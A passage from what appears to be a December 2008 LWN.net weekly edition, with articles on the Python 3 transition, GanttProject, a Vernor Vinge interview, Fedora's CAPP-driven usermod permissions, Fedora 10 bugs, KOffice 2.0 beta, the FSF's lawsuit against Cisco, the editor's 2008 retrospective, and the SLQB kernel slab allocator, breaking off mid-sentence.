community should have added more shiny features to the language while they
were at it.  And, of course, there's a "just right" crowd taking the
position that the changes in Python 3 are just about as they should
be.  See this
discussion by James Bennett for a well-argued description of the "just
right" position.


Time will tell which position is closest to reality.  If the "too large"
group is right, Python 3 (or Python in general) will fade away as
developers, unhappy with the break, move to a language they like better.
If Python 3 is too small, there will be strong pressure for a
Python 4 in the too-near future.  Your editor, though, thinks that the
Python community has come pretty close to getting it right.  Things that
truly needed to be fixed got fixed, but the Python developers resisted the
temptation to try to do too much.  They watched, from a safe distance, what
happened with the Mozilla rewrite and Perl 6, and wisely concluded
that their lives - and the lives of those who use Python - would be better
if they avoided a similar experience.  So they limited their goals and were
able to get the job done in a reasonable amount of time.


Except, of course, that the job is not really done.  To begin with, the
presence of a few difficulties with the 3.0 release should not surprise
anybody.  The developers forgot to remove the deprecated cmp()
function, with the result that newly-converted code may come to depend on
it.  There are some performance issues.  A couple of other features are not
working quite right.  Getting Unicode truly straightened out may take a
while yet - a problem which is certainly not unique to Python.  The list
seems to be quite short given that this is a 
major release of a complex programming language, but there are still things
to fix.  So there will almost certainly be a 3.0.1 release before the end
of the year, and a 3.0.2 in (approximately) February.


Meanwhile, the Python hackers have made it clear that the 2.x version of the language
will be supported for some years yet.  Version 2.6, available now,
includes a number of features aimed at making the eventual port to 3.0
easier.  As the porting projects get serious, other ways to help that
process will become clear; there will be an eventual 2.7 release which
incorporates those lessons wherever possible.  A 2.8 release further down
the road has not been ruled out.  The current plan seems to be to maintain
Python 2.x for at least the next three years.


[PULL QUOTE: 
For many Python developers, it is not yet really time
to make the jump to 3.0.
 END QUOTE]


That is good because, for many Python developers, it is not yet really time
to make the jump to 3.0.  The core language appears to be in
reasonably good shape, but a language like Python involves much more than
the core.  Most non-trivial code makes heavy use of the wide variety of
Python libraries, and, at this point, many or most of those libraries do
not support Python 3.  So, now is a good time for library maintainers
to be looking at moving to 3.0, but application developers who try to
port their code now are likely to run into frustration.  Porting smaller
programs or subsystems as an exercise in learning the new language may make
sense, but complex application porting probably cannot happen for a little
while yet.


What distributors should be doing is another question.  So far, it would
appear that only Fedora is having a (public) discussion on how to handle
the Python 3 transition - see this
thread - and they don't really know what they are going to do yet.
Fedora's maintainers, it seems, would prefer to stay with Python 2 for
the indefinite future; the chances of Python 3 making an appearance in
Fedora 11 are quite small.  There is a strong wish to avoid
maintaining both 2.x and 3.x on the same distribution release; they would
rather make a clean switch.

Your editor suspects that the flag-day approach to the language transition
is not going to work.  There are a lot of packages which need to be ported,
and many of the people doing the porting would appreciate support from
their distributor.  Red Hat dragged its feet for a long time on the
transition to Python 2, with the result that many users had to build
and install the newer version of the language themselves.  For Fedora to do
the same with Python 3 is a sure path toward user frustration.


That said, keeping both versions of the language around is not a task for
the faint of heart.  Installing a different version of Python itself is
quite easy.  Keeping a whole set of modules for multiple versions is
distinctly less so.  This will be especially true for Fedora; some other
distributions (especially the Debian-derived ones) have better mechanisms
for (and experience in) maintaining multiple versions of core system tools.
So the reluctance on the part of the Fedora developers to take on this work
is thus unsurprising.  Perhaps this would be a good opportunity for offers
of help from the wider Fedora community.

It may well take a couple of years, but this transition will eventually be
made and people will eventually wonder what all the fuss was about.  And,
when it's done, we'll have a cleaner, more maintainable, more
Unicode-rational version of an important programming language to work
with.  That, one hopes, will be worth the short-term pain involved in
getting there.

(For more information, see the Python3000 FAQ,
currently under development).

		Create and Manage Gantt Charts with GanttProject


GanttProject
is an open-source cross-platform Java application that can be used
to generate
Gantt charts
for the management of projects.  Different components of
GanttProject have been
released
under the GPL and Apache licenses.
The project is described:


GanttProject is a free and easy to use Gantt chart based project scheduling and management tool. Our major features include:
Task hierarchy and dependencies, Gantt chart, Resource load chart,
Generation of PERT chart, PDF and HTML reports,
MS Project import/export, WebDAV based groupwork.


The learn about
document explains more of the project's features and 
some
screen shots
show some examples of what an older version of GanttProject looks like.
Version 2.0.8 of GanttProject was recently

announced:


The major improvement in GanttProject 2.0.8 is that task web links now appear in PDF and HTML exports. Besides, those who use filesystem paths as web links, now can specify relative path to a file from .gan file location. GanttProject 2.0.8 also includes a few bugfixes and localization improvements for Croatian, Japanese and Colombian users.


Installation of GanttProject 2.0.8 on an Ubuntu 8.04 system was
fairly straightforward.  The software was

downloaded and unzipped.
The prerequisite Sun Java Runtime Environment was
downloaded
and installed.
The ganttproject.sh startup file was given execute status and
run, the application started up as expected.


GanttProject is easy to figure out.  There are top-level tabs for
creating charts and resources (people).  Tasks can be added, assigned
date ranges and a variety of other attributes.  Tasks can be tied to
other prececessor tasks and assigned to people.
It only took a few minutes of poking around the software to create a
new project, produce a simple Gantt chart and output a PostScript
file that was suitable for printing.


GanttProject is not alone in its ability to generate Gantt charts
under Linux.
Planner is a
project management tool for the GNOME desktop environment and
TaskJuggler is yet
another project management tool.  Both of these applications
have a broader project management scope.
If your needs only require generating Gantt charts, GanttProject
is a straightforward application that can be used to easily
produce professional looking results.


		Interview: Vernor Vinge


Science fiction writer Vernor Vinge is best-known for novels like A
Fire Upon the Deep and Rainbows End, as well as the concept
of The
Singularity -- the idea that, in the next couple of decades, humans
will become or create a super-human intelligence. What is less well-known
is that Vinge has been a free software supporter since the earliest days of
the Free Software Foundation (FSF). He has served several times on the jury
for the FSF Awards and spoke at an FSF-sponsored event held last month in
San Diego to coincide with the LISA conference. As someone who deals
regularly with large scale speculations, Vinge places free software in a
larger historical context. He even speculates that free software may be one
of the factors that will shortly bring about the Singularity. 


Part of Vinge's interest in free software is personal. A mathematician and computer scientist, he quickly found that the rise of proprietary software greatly increased the difficulties of teaching. 

 "When I looked at contracts and user-agreements," he
recalls, "the legalese was extraordinarily intimidating, not just
because it was complicated, but because it actually seemed to restrict
things to the point where it was really difficult to imagine how a student
could follow the agreement and still do a project. So the openness that was
in the GNU General Public License (GPL) was really very, very
welcome." Vinge soon got into the habit of giving students "a
little spiel about the GPL" and encouraging them to license their
projects under the GPL.  

"If they did that," he says, "that would mean I would be
able to use their stuff in later projects with other students. And a very
large percentage of students in most classes though it was a cool enough
idea that they actually did use [the GPL] in their projects." 

The historical trend to cooperative infrastructure

However, as important as free software may have been to Vinge in his teaching, what  seems to interest him the most is placing free software in a broader historical context. Early on, Vinge came to view free software -- and, later on the Internet and social networking applications that it was instrumental in creating -- as part of a historical trend towards creating an increasingly elaborate "infrastructure of trust and cooperation" that increases the rate of technological advance.


Vinge says: "There are business inventions of the last 2000 years
like the widespread use of loans and credit, the use of insurance, the use
of limited liability corporations, all of which involve at least at the
beginning, a leap of trust." To Vinge, free software, the Internet and
social networking are simply the latest extensions to the infrastructure
created from such institutions. What these institutions all have in common
is that they allow people to interact in more creative and productive
ways.


More specifically, he sees free software as the natural and more logical
extension of the insight that had produced the shareware culture a few
years before the start of the GNU Project and the FSF.  With
the emergence of the personal computer, entrepreneurs were finding that
"the barriers to entry were so low that you didn't need a lot of the
overhead that was involved in commercial stuff, and you might just be able
to get away with trusting people to pay you. There was much blind feeling
around the concept of producing stuff in some sort of context that was
different from cars." 


According to Vinge, what the GPL and the software and institutions that
have grown up around it have produced is "a platform for experimenting with
social invention. In the 20th and 19th century, if you wanted to experiment
with a new infrastructure for people to interact in, in most cases, like
with the railroads, you needed enormous effort. And now -- we can actually
do social experiments -- cooperative experiments -- much more cheaply, and
you can design ways for people to interact based on just the software
guiding what the interactions are like." 


Vinge acknowledges that the consequences have not always been beneficial.
"One thing the last ten years have proved is that we seem to be very
bad at thinking how stuff can be abused," he says, no doubt thinking
of such phenomenon as crackers and online predators. "Any time you
can make something a hundred or a thousand times cheaper than it was
before, there are probably side-effects. But there's a tendency when
something works really, really well to push it hard and deliberately avoid
thinking about side-effects." 


Still, the main change has been beneficial overall in Vinge's view. In
particular, he says: "One nice thing is that the price of failure is
a lot lower than what you might imagine in the 19th century. Say someone
spent ten million 1850 dollars, to make steam-powered dirigibles. Now, it
doesn't work, and you've just spent a lot of money, and you don't have
anything except a lot of ruined effort. Now, there's still ruined effort if
something doesn't work out, but you can retarget or repurpose much more
easily, and you can justify taking much larger leaps of faith than you
could in 1850." The result is that more experimentation, and more and
quicker development becomes possible.  


In this view, free software represents the currently most-advanced
realization of the possibilities inherent in computer technology. "It's an
interesting, science-fictiony, parallel-world story to imagine what would
have happened if Richard Stallman hadn't come along with the GPL," says
Vinge. "Without Richard Stallman's insight, I think we would have
eventually got something like what we got with free software, but it would
have been a very interesting muddle. [The process] could have gone for
years, and it could easily have gone on so many years that it impacted the
era in which really large stuff can be built in the free model. So,
overall, I think we would have got something, but, even now, the low
overhead involved and even the insight that comes from the GPL would not be
with us."


In other words, the GPL and modern computer structures are all "in
the tradition of the last few centuries. They're taking the traditions that
we saw with the industrial revolution and adding several layers of
magnitude to that flexibility." 

Bringing on The Singularity

Although speculation is part of Vinge's stock in trade as an SF novelist,
he is cautious about predicting the future. "I always rush to say,
'Terrible things could happen!'" he says. "A giant meteor could hit the
earth, or a civil war could happen." 


However, caution aside, Vinge does concede that "we have the tools to
keep running along the same lines for some time. And, in the absence of
disaster, it quickly runs to the point where you're talking about stuff
that's of the same significance as the rise of the human race within the
animal kingdom." In other words, the Singularity arrives.


Vinge does not offer a map of exactly how free software and its
infrastructure will lead to the Singularity. But, given the probable
inability of humans to understand super-human intelligence, he
should not be expected to do so. "It's easy to imagine," he says, "but you
run out of adjectives and high-sounding words that could mean anything to
someone like us." All that can really be said is that, as the latest
manifestation of the historical trend to increasingly complex cooperative
infrastructures, free software plays a large role in creating a future in
which the Singularity becomes increasingly inevitable.


"I think that's going to happen in the relatively near historical
future," says Vinge. "And these sorts of trends are all
consistent with that possibility." 


Meanwhile, Vinge is personally content with the improvements that have come
to free software in the last couple of years. He is particularly pleased
that you can download and install a stable and easy to use operating system
in an afternoon. "If you look back over the last ten years, you see how
easy it's become to do things," he says. "It's silly to put number to this,
but it's ten or a hundred times easier now. I can remember spending days
getting PPP to work. And now, you just plug this cable into that socket,
and it works. I feel much more able to do what I have to do without having
to worry very much, without having Catch-22s nibble me to death. Things
have really come together in a coherent and useful way."


		Fedora and CAPP


Removing the ability for regular users to execute "system" programs has a
certain appeal, but does it really provide any extra security?  A thread on
the fedora-devel mailing list explores that question in the context of
usermod (and other, similar tools), which had their permissions
changed more than two years ago in an effort to meet security certification
requirements.  Whether these changes, and at some level the certifications
themselves, actually increase the security of the system is the open question.


Callum Lerwick noticed that running
usermod no longer worked as a regular user.  He has a habit of
doing that to get a quick overview of the command syntax and options from
the help page, but unless he uses sudo, that doesn't work.  That
was done on purpose as Steve Grubb describes:

These should have been gone for quite a while...and on purpose. You cannot do 
anything with them unless you are root. Allowing anyone even to execute them 
would require lots of bad things for our LSPP/CAPP evaluations.


LSPP and CAPP are two protection profiles that are used for Common Criteria
security certifications (such as EAL3) that Red Hat Enterprise Linux (RHEL) has
earned.  Because these tools can modify trusted databases
(e.g. /etc/shadow), attempts to run them by untrusted users must
be added to the audit log in order to comply with the certifications.  But
adding audit events requires the CAP_AUDIT_WRITE capability bit; in today's
systems that effectively means setuid(0).  As Grubb puts it: "IOW, if we open the
permissions, we need to make these become setuid root so  
that we send audit events saying they failed."


Leaving aside the idea that only processes with root
permissions are allowed to generate auditable events—which seems a
bit bizarre—there is still the question of how much protection is
provided by changing the file permissions.  Seth Vidal asks:

And do we seriously think we can keep the code away from a non-root user 
by chmodd'ing the binaries? A user can get a binary for anything 
fedora can install in about 30s w/firefox.


Allowing users to download binaries "takes the 
system out of the certified configuration", according to Grubb, "So, if you need to
be in the CAPP  
certified configuration, don't let users do this."  This fairly
clearly demonstrates the dubious nature of the security afforded by the
current certifications.  For the most part, the protection profiles
define away nearly all of the interesting threats that most systems face
today. 


To a large extent, CAPP/LSPP certifications are the kinds of things listed
in marketing materials for "enterprise" operating systems rather than
serious attempts to address the real security needs of the vast majority of
network connected systems.  Grubb provides an excellent overview of some of the requirements of CAPP,
along with how they are implemented in Fedora
as part 
of the discussion.  The CAPP
information page gives the full story, however:

The CAPP provides for a level of protection, which is appropriate for an
assumed non-hostile and well-managed user community requiring protection
against threats of inadvertent or casual attempts to breach the system
security. The profile is not intended to be applicable to circumstances in
which protection is required against determined attempts by hostile and
well-funded attackers to breach system security.


But CAPP does require that all attempts to modify trusted databases
like the shadow password file generate an audit trail, so there is a
lower-level audit rule set up for that file.  Any access to
/etc/shadow, for example, is logged as Grubb describes in his
overview.  That, though, begs other questions as Lerwick points out:

So we *are* auditing low level filesystem calls? So then what, other
than security theater, does auditing execution of usermod gain us?


The answer is that auditing execution of usermod by non-root users
gains exactly one thing: CAPP compliance.  It requires that binaries which
modify trusted databases leave an audit trail.  Even though any actual
attempt to access the underlying file will be logged, just accessing the
binary that could modify the file is also something that must be
logged. 


Part of the dismay displayed in the thread comes from the fact that Fedora
will probably never be certified with CAPP for any number of reasons.  So
taking away longstanding user abilities, though there are reasonable
alternatives like man usermod, for a certification that won't be
done, doesn't sit well with some in the Fedora community.  Though, as Jef
Spaleta notes, there might be a use for the
certification in a Fedora spin:

 Is there need for certified
'appliance' situations that a new 3rd party could leverage Fedora to
create?  I can imagine all sorts of no network software appliance
situations where the CAPP certification applies and a Fedora derived
image would be a good development target.


There is always going to be tension between the security needs of an
"enterprise" distribution like RHEL and a more user/desktop-oriented
distribution like Fedora.  While the specific reduced functionality in this
case is fairly minimal, the discussion increased the visibility of the
auditing required for certification as well as what that means for both
distributions.  The original decision was made back in the Fedora Core days
when there was much less visibility and community input into the process.
Discussions like this will only help continue the process of opening up
Fedora while also exposing some of the inadequacies of security
certifications.


		Problems with Fedora 10


LWN has received several emails regarding bugs in Fedora.  These are
serious bugs that can prevent you from installing new updates, or new
packages of any kind.  Fedora users may want to be aware of the following and, perhaps, wait until things settle down a bit.

The start things off, bug #475068
was reported for Fedora 9 with x86_64.  This bug is present in Fedora 10
and also affects x86 systems.  There was a workaround
for this bug, for Fedora 10 users, involving using yumdownloader
to install an older version of dbus.  Unfortunately the older packages
won't show up on all mirrors.  It is still possible
to recover from this bug by manually editing /etc/dbus-1/system.conf
and rebooting the system.  Fedora 9 users will need this
version of PackageKit.  For Fedora 10 you'll want this
version of PackageKit.

Bug
#475069 covers a dbus access problem with bluez.  If you are seeing the
error message: "Agent registration failed: A security policy in place
prevents this sender from sending this message to this recipient, see
message bus configuration file (rejected message had interface
"org.bluez.Adapter" member "RegisterAgent" error name "(unset)" destination
"org.bluez").", this may
help.  Fedora 9 users will want bluez-utils-3.36-3.fc9.
Fedora 10 users should grab bluez-4.22-2.fc10.
If you are still running Fedora 8 the proper package to get is bluez-utils-3.35-5.fc8.

Another bug that may be troubling you is bug #469434,
in which subnetmask settings are not saved.  For some people this has been
fixed.  That fix did not seem to work for everyone though.  The system-config-network-1.5.94-2.fc10
update does seem to work.

If you run into the error "PackageKit failed to get a TID" you will want to
see this
forum thread which affected several people on December 7, 2008.  So
far, no fix seems to be forthcoming.


Bugs in PackageKit are especially troubling for some, since you can't
install an update using the GUI tools.  Your editor completed a fresh
install of Fedora 10 last weekend on an aging Thinkpad laptop.  After the
usual update she could no longer find or update any packages.  A manual
yum update did not help.  It would appear that bug #475656
addresses the error "failed to get a TID: A security policy in place
prevents this sender from sending this message to this
recipient...".  No doubt a SELinux expert could edit the offending
policy.  The rest of us will have to wait for a fix.

Editors note: as noted in the comment below, this is a DBus security problem and has nothing to do with SELinux.  This last bug was reported December 9, and by December 10 a fix was already being tested.


		A look at KOffice 2.0 Beta 3


The KDE office application suite, KOffice is getting closer to its 2.0
release.  Beta 3 was announced
November 19, with another beta due any day.  The final release is expected
early next year, so it seems like a good time to take it for a spin.


The beta releases are available for Kubuntu
Intrepid Ibex (8.10), making it relatively easy to try out.  There are
also openSUSE and Debian packages available as well as source code (of
course).  The author didn't look forward to trying to build KOffice on his
normal Fedora 9 desktop, so borrowing an Intrepid laptop from the wife was in
order; after that enabling the "Unsupported Updates" and installing the
koffice-kde4 package (which didn't seem to work through the GUI, but
apt-get worked just fine) is all that it took.


The initial impression was a bit rocky as most of the small handful of ODF
files that were 
opened caused KOffice to crash.  It is a beta, though, so some of that is
to be expected.  Trying again with the imminent Beta 4 and filing bugs for
failures should be high on the author's list.  The one presentation file
that successfully opened in KPresenter seemed to have lost much of the
formatting that was present in the original, which was also disheartening. 


It should be noted that the author is hardly an office suite "power user".
Normally, OpenOffice.org is used for minimal business documents (invoices
mainly), simple spreadsheets (expense reports, football pools), and boring,
bullet-list slides for 
presentations (as anyone who has been to one will attest).  By and large,
these simple needs are met by OpenOffice, with the added bonus of being
mostly able to open the various Microsoft-format documents that
unfortunately cross the desktop.  Any other office suite with similar
capabilities would serve just as well.


Opening spreadsheets in KSpread provided the most reliable experience when
opening existing documents, but there were still a number of problems.
Formulas did not calculate automatically regardless of the auto-recalculate
setting, but the data was there, unlike some of the other document types.
KWord seemed to be unable to open any of the ODF documents tried, crashing
in all cases.  One "handy" .doc file opened, but the formatting and
contents were mangled; OpenOffice can reproduce the formatting of that
document pretty well.  KWord also crashed on exit from that
document. Perhaps betas are not the place to try opening 
existing files.


There clearly are many new features
in KOffice 2.0, but the major ones, porting to KDE4/Qt4 and using the Flake object
library throughout, are infrastructural in nature—they aren't
obvious to users.  Much like KDE 4.0, it would appear that KOffice 2.0 is a
launching pad for subsequent releases. 


There is an emphasis on a consistent user interface between the various
applications which does stand out when using KOffice.  For better or worse,
the OpenOffice interface is fairly consistent between applications as well,
but seems more cluttered, or more poorly organized somehow.  Using Flake
everywhere will be a boon to those who are power users as it treats
everything as a "shape" that can be transformed (via scale, rotate, skew) and
moved between any of the separate applications.  Vector graphics can
cohabitate with raster graphics and text easily.


Using KOffice 2.0 is fairly straightforward for simple tasks.  It is
noticeably slower than OpenOffice on the same hardware.  Opening files,
even empty documents seems to take an inordinate amount of time.  Even
moving around within KSpread or KWord seemed sluggish.
Presumably these are things that will be fixed, whether that will be in the
next few months or for KOffice 2.1 remains to be seen.  This beta gives the
impression of great promise, but not yet a very usable tool.


Of course, there is more to KOffice than just the three applications
mentioned.  The database application Kexi is not yet part of the KOffice
2.0 release, nor is the Visio-like flowchart program Kivio.  Two drawing
applications, Karbon14 for vectors and Krita for raster graphics have been
released with the beta.  Other than a quick startup to see if the interface
was consistent with the rest of the suite—it was—the author
didn't try them.  The same goes for KPlato, the project management and
planning application, though it has a rather different look—no
toolboxes on the right hand side—likely because of its very different
needs. 


Perhaps unfairly, the author expected a bit more from this beta release.
It would seem there is still a fair amount of work to do before the final
2.0 version, but there are still a few months left.  For whatever reason,
previous attempts to use KOffice had always caused the author to quickly
switch back to OpenOffice.  Even though there were so many problems, this
KOffice—or more likely 2.1—somehow seems more plausible to
switch to.  Another look in a few more months is likely called for.


		The FSF raises the stakes for Cisco


On December 11, the Free Software Foundation announced the filing of a
GPL-infringement lawsuit against Cisco.  This action represents another step
in a long series of license-compliance issues involving Cisco and its
subsidiaries.  It 
may look like just another licensing lawsuit, but it represents an
interesting step in the evolution of attitudes toward compliance with the
GPL.  The eventual outcome is fairly predictable, but the process is still
worth watching.

Cisco does look like a serial offender with regard to the GPL.  Most of its
problems in this area were actually acquired with its purchase of Linksys;
routers made by Linksys have been been followed by GPL issues since at
least 2003.  Over those years, a fairly consistent pattern has developed: a
new Linksys product is released which, upon inspection, is determined to be
running GPL-licensed software.  There is no corresponding source release,
which is a clear violation of the GPL.  After a series of contacts and
negotiations, some of the copyright holders involved succeed in getting a
source release - though that release is not always as complete as it should
be.  The problem appears to be solved - until the next product comes out.

The sad part is that there is almost certainly no real desire on the part
of Cisco or Linksys to violate the GPL.  The company is being set up for
trouble by its suppliers - the firms based in the far east which actually
make the hardware sold under the Linksys name.  Those suppliers feel,
perhaps with good reason, that they need not concern themselves with the details
of license compliance.  There is not, after all, much of a history of
successful license enforcement in that part of the world.  So they deliver
an infringing product which Cisco then resells; it could well be that Cisco honestly
has no idea that those products incorporate software in
violation of its license.  Of course, it could also be that Cisco does not
really want to know about such problems.

Nameless original equipment manufacturers in China are a difficult target
for those who would enforce the GPL; a high-profile American company is
clearly easier game.  Beyond that, though, Cisco is a legitimate target for a lawsuit:
the company is distributing GPL-licensed software without making the source
available.  It is also an appealing target because Cisco is  in a
position to apply pressure on those nameless suppliers: if a company of
that size refuses to resell equipment which does not come with
fully-licensed software (whether free or proprietary), its suppliers will
learn to pay attention.  The FSF is arguing, in essence, that it is Cisco's
responsibility to put a program in place to ensure that its suppliers are
delivering properly-licensed software.  It is Cisco which should be finding
licensing problems in its products, not the owners of the code it is using.

The complaint
[PDF] describes a long series of meetings with Cisco.  Several times,
the complaint says, "Defendant corresponded with Plaintiff
repeatedly regarding the matter and Plaintiff believed in good faith that a
satisfactory resolution of its concerns could be reached."  But then
more problems always turned up.  So, after a few years, the FSF has given
up:


	Given Defendant's extensive history of violating Plaintiff's
	Licenses, Plaintiff considers Defendant's current and proposed
	activities insufficient to ensure Defendant's future compliance.
	Defendant has refused to meet several of Plaintiff's reasonable
	requirements for reinstatement of Defendant's right to distribute
	the Programs. Defendant has not demonstrated that it has
	meaningfully improved its software review process which failed to
	prevent previous violations, or that it intends to do so. Defendant
	has refused to acknowledge its previous violations or inform the
	users who received Infringing Products of its omissions. And
	Defendant has refused to provide regular compliance reports to
	Plaintiff regarding Defendant's pervasive exploitation of
	Plaintiff's software. Nonetheless, Defendant continues to
	distribute the Infringing Products and Firmware in violation of
	Plaintiffs' exclusive rights under the Copyright Act.


The complaint alleges that Cisco is guilty of copyright infringement.  The
court is asked to provide injunctive relief - taking the offending products
off the market.  The FSF is also asking for damages, attorney's fees, and
"all profits derived by Defendant from its unlawful acts."

All this would be a heavy price for Cisco to pay.  And it could well be
that a court would go along with most of these requests.  The fact of the
matter, though, is that things are unlikely to get that far.  Unlike, say,
SCO, Cisco has not made any statements about the validity of the GPL.  It
is an active contributor to GPL-licensed projects, including the Linux
kernel.  Cisco's behavior looks more like negligence than malice.  This
suit will probably get the attention of people in very high levels of
management at Cisco; they, in turn, will almost certainly come to the table
and find a way to make the FSF go away.  There is no value for them in any
other course of action.

So this episode will blow over, probably within a few months.  But there
are still a couple of interesting things to note here.  One is that the
Linux kernel is not involved in this suit at all, and neither is Busybox.
Those two projects have been at the center of most GPL-enforcement actions
thus far.  The FSF, though, is focusing on projects that it owns: glibc,
GCC, coreutils, binutils, gdb, and wget.  That widens the scope somewhat,
showing that GPL compliance is not just required for a small number of
programs.

Incidentally, all of the code at issue in this suit is licensed under
GPLv2; version 3 of the license is not part of this action.

This suit also marks a bit of a change for the FSF, which, traditionally,
has strongly favored quiet resolution of GPL-compliance issues.  It seems
that even the FSF has a point where its patience runs out.  It may also be
that the influence of the Software Freedom Law Center, which appears to be
rather more willing to go to court, is being felt at the FSF.  In any case,
it is reasonable to expect that the FSF might find itself involved in more
legal actions in the future.

This lawsuit will doubtless be used by people to show how use of
GPL-licensed software can create risks for companies.  The truth is more
straightforward, though.  Use of any copyrighted material without an
accompanying license is generally against the law; incorporating such
material into products will always be a risky thing to do.  There is
nothing special about the GPL in that regard.

		The Grumpy Editor's 2008 retrospective


Holidays are an exercise in tradition.  One of the more charming holiday
traditions around LWN is to look at the predictions made at the beginning
of the year and measure them against reality.  There is, after all, great
value in things which make us laugh.  This year's predictions were featured
in the January 3, 2008
edition.  As might be expected, some of them were better than others.

What was predicted

Your editor's first prediction was that support for Flash playback would
mature in 2008.  In some sense, that may be true.  Your editor's desktop
system, running the Rawhide build of Gnash, can now faithfully display a
wide variety of Flash ads, web site "intros," and various other thoroughly
useless bits of media.  A Flash-based "interactive tour" offered by LWN's
bank worked nicely.  But support for many other Flash features, including
audio and 
simple playback from online sites, still is not especially solid, and other
interactive Flash applications do not work at all.  This problem, it seems,
is still not solved.

The prediction of the KDE 4.0 release required little in the way of
foresight, as did the prediction that users would be unhappy.  That stage
was well set before the beginning of the year.  A continued focus on power
management was also an easy thing to foresee; there will be great value in
making our systems more power-efficient into the indefinite future.

Flush from those two obvious successes, your editor went off and stated
that the bulk of the realtime tree would be merged into the mainline kernel
by the end of the year.  Oh well.  Your editor should know by now that
expecting deterministic merge times for realtime patches is a sure path to
disappointment; latencies in this area are always higher than one would
like.  In this case, the realtime developers got stuck in a 
high-priority interrupt (taking over the x86 architecture) with the result
that realtime work got preempted and suffered from severe starvation.

As predicted, debate over Microsoft's OOXML format continued, and Microsoft
succeeded in obtaining standard status for that format anyway.  Things have
since gotten quieter, though, perhaps because people see it as a done deal
and no longer worth fighting about.

The GPL was the subject of two predictions this year.  One was that more
projects, perhaps even glibc, would move to GPLv3.  There is a steady
stream of analyst verbiage to the effect that GPLv3 is quickly growing in
popularity (example),
but the truth of the matter is that the number of conversions in projects
which really matter appears to be low.  Projects with significant numbers
of developers and users continue to approach GPLv3 with caution.

The other prediction was that GPL enforcement actions would continue, and
perhaps grow.  The recent FSF lawsuit against Cisco makes it clear that the
GPL enforcers are serious about what they are doing.  Your editor cannot
help but wonder, though, whether the increasingly litigious actions by the
Software Freedom Law Center might not eventually lead to a serious backlash
within the community.  We are about freedom, not punitive damages.
Enforcement of the GPL is necessary if we expect our licenses to be taken
seriously, but overly zealous - or greedy - litigation could encourage
those who say that 
use of free software exposes companies to an unacceptable level of risk.

Your editor included a rosy prediction about the One Laptop Per Child
project and where it would go over the course of the year.  In fact, OLPC
has continued to work toward its goal of putting laptops into the hands of
children around the world.  But your editor completely missed the way
internal divisions would rise to the surface and distract OLPC developers
from what they are trying to do.  OLPC seems to have moved beyond the worst
of that, and much-needed development on the Sugar software continues.  But
the project seems far from its original goals, and the increasing
popularity of ultra-mobile systems, while vindicating the original vision
behind the OLPC hardware, threatens to render the XO hardware obsolete and
irrelevant. 


Ever the optimist, your editor said that the days of hardware hassles would
be over.  We are closer.  Finding an off-the-shelf system - server,
desktop, laptop, or palmtop - which is fully supported by Linux is now
easily done.  OK, maybe the modem is not supported, but few people will be
inconvenienced by that omission anymore.  That said, there will probably
never be a shortage of uncooperative hardware manufacturers; if we value
our free operating system, we must continue to
support manufacturers who work with our community, and avoid those which do
not.


The prediction that the intensity of competition between distributors would
increase was reasonably well satisfied.  One need only look at Novell's
"migrate from Red Hat" offering or the continued attacks on Ubuntu, not all
of which have to do with its community participation.

Finally, the three "community" predictions at the end of last January's
article were all satisfied reasonably well.  None of them were especially
daring, so that should not be surprising.

What was not predicted

One commenter in January asked about the lack of predictions about SCO.  In
December, it is hard to say that SCO deserved a place there.  The company
still exists in some form, but it no longer has much to warrant the
attention of the Linux community.  Your editor predicts that there will be
no SCO predictions in 2009 either.

So what else did your editor miss?  Perhaps at the top of the list is the
evolution of the Linux platform as it is used in mobile devices, and in
cellular telephones in particular.  Google's (unpredicted by your editor)
Android platform has made a splash, regardless of what one might think of
its openness.  The first Android phone has been reasonably well received,
and it would appear that more are on the way.  The merger of the LiPS and
LIMO consortia shows that some consolidation is happening in this area.
The announced plans to open Symbian were also an interesting development.
In the near future, the handset business seems likely to be firmly
dominated by free software - though, alas, the bulk of those handsets will
not be designed to pass the benefits of that freedom on to their owners.

Your editor has often predicted software patent troubles, though he did not
do so in 2008.  What was completely unforeseen, though, was Red Hat's resolution
with Firestar Software.  The company got itself out of a patent bind, and,
in the process, removed the patent as a threat to the wider development and
user community too.  We may see this sort of solution repeated for patent
problems in the future - if we are lucky.

Finally, unpredicted - and unpredictable - was the series of
"infrastructure issues" which shut down much of the Fedora project for a
good month.  That episode showed us a number of things: how much some of us
depend on our distributors' infrastructure, how vulnerable we can be to
intrusions, and how the interests of the companies behind some
distributions can interfere with the availability of useful information.
Months after the fact, we still have no idea what happened with the Fedora
project; it is not unreasonable to wonder if we will ever know.

Despite problems like that, and other small distractions (the total
meltdown of the global financial system, for example), Linux has only grown
stronger over the last year.  Our community has grown, our software has
gotten better, and the economy around free software has gotten stronger.
Your editor predicted that, too, but not even he is so arrogant as to claim
credit for having foreseen something nearly as obvious as the sunrise.

		SLQB - and then there were four


The Linux kernel does not lack for low-level memory managers.  The
venerable slab allocator has been the engine behind functions like
kmalloc() and kmem_cache_alloc() for many years.  More
recently, SLOB was added as a pared-down allocator suitable for systems
which do not have a whole lot of memory to manage in the first place.  Even
more recently, SLUB went in
as a proposed replacement for slab which, while being designed with very large
systems in mind, was meant to be applicable to smaller systems as well.  The consensus
for the last year or so has been that at least one of these allocators is surplus
to requirements and should go.  Typically, slab is seen as the odd
allocator out, but nagging doubts about SLUB (and some performance
regressions in specific situations) have kept slab in the game.

Given this situation, one would not necessarily think that the kernel needs
yet another allocator.  But
Nick Piggin thinks that, despite the surfeit of low-level memory managers,
there is always room for one more.  To that end, he has developed the SLQB allocator which he hopes to
eventually see merged into the mainline.  According to Nick:


	I've kept working on SLQB slab allocator because I don't agree with
	the design choices in SLUB, and I'm worried about the push to make
	it the one true allocator.


Like the other slab-like allocators, SLQB sits on top of the page allocator
and provides for allocation of fixed-sized objects.  It has been designed
with an eye toward scalability on high-end systems; it also makes a real
effort to avoid the allocation of compound pages whenever possible.
Avoidance of higher-order (compound page) allocations can improve
reliability significantly when memory gets tight.

While there is a fair amount of tricky code in SLQB, the core algorithms
are not that hard to understand.  Like the other slab-like allocators, it
implements the abstraction of a "slab cache" - a lookaside cache from
which memory objects of a fixed size can be allocated.  Slab caches are
used directly when memory is allocated with kmem_cache_alloc(), or
indirectly through functions like kmalloc().  In SLQB, a slab
cache is
represented by a data structure which looks very approximately like the
following:


(Note that, to simplify the diagram, a number of things have been glossed over).


The main kmem_cache structure contains the expected global
parameters - the size of the objects being allocated, the order of page
allocations, the name of the cache, etc.  But scalability means separating
processors from each other, so the bulk of the kmem_cache data
structure is stored in per-CPU form.  In particular, there is one
kmem_cache_cpu structure for each processor on the system.

Within that per-CPU structure one will find a number of lists of objects.
One of those (freelist) contains a list of available objects; when
